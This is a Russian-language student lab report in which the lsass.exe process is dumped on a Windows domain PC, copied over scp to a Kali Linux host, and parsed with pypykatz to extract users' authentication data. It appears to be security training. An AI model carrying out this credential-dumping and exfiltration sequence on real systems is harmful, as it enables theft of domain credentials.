# Практическая работа №3 AAA в Windows. ## 3.1 Эмуляция работы пользователей на машине В данной работе необходимо проанализировать процесс lsass.exe. Проведем эмуляцию работы пользователей на машине. Снимем дамп процесса. Вход под пользователем Olga на машину pc1 ![](https://i.imgur.com/K48c51x.png) Обратимся к доменным ресурсам ![](https://i.imgur.com/QuMICSB.png) Выйдем из учетной записи Olga ![](https://i.imgur.com/0Wobh4O.png) Зайдем под учетной записью Petr ![](https://i.imgur.com/e1bV0DI.png) Запустим командную строку от имени администратора ![](https://i.imgur.com/HiBDcgG.png) Пользователь Petr не обладает правами администратора, поэтому введем учетные данные ADMPetr ![](https://i.imgur.com/NGKK1Uf.png) Проверим что мы действительно ADMPetr ![](https://i.imgur.com/TyrwIIl.png) Запустим диспетчер задач из командной строки, запущенной из под пользователя ADMPetr ```bash= taskmgr ``` ![](https://i.imgur.com/BUH0f4x.png) В подробном представлении найдем процесс lsass.exe ![](https://i.imgur.com/te0iXfG.png) Создадим дамп процесса ![](https://i.imgur.com/Ptrq01E.png) ## 3.2 Работа с Kali Linux Войдем в Kali Linux ![](https://i.imgur.com/DbvxLZn.png) Настроим сетевое подключение ![](https://i.imgur.com/p2d5cYo.png) Запустим консоль ![](https://i.imgur.com/Y5p5Wea.png) Повысим привилегии через ```bash= sudo -i ``` ![](https://i.imgur.com/ONZurEF.png) Включим сервис ssh ```bash= systemctl start ssh ``` ![](https://i.imgur.com/cQJOE7N.png) Передадим дамп процесса lsass с машины pc1 на машину с Kali Linux ```bash= scp C:\Users\ADMPetr\AppData\Local\Temp\lsass.DMP kali@192.168.10.203:/home/kali ``` Подтверждаем передачу файла и вводим пароль Kali Linux ![](https://i.imgur.com/ryhFG0Y.png) Файл передан ![](https://i.imgur.com/CbcJFih.png) Проверим что файл передан ```bash= ls /home/kali ``` ![](https://i.imgur.com/bkskqtL.png) Перейдем в директорию с дампом lsass ```bash= cd /home/kali ``` И скачаем скрипт pypykatz ```bash= git clone https://github.com/skelsec/pypykatz ``` ![](https://i.imgur.com/B5VE8GC.png) Для анализа файла дампа перейдем в каталог pypykatz выполним команду ```bash= cd pypykatz pypykatz lsa minidump /home/kali/lsass.DMP ``` Получаем анализ дампа, который содержит аутентификационные данные различных пользователей ![](https://i.imgur.com/ilCZevC.png) ![](https://i.imgur.com/CadBBmZ.png) ![](https://i.imgur.com/I7E98l7.png)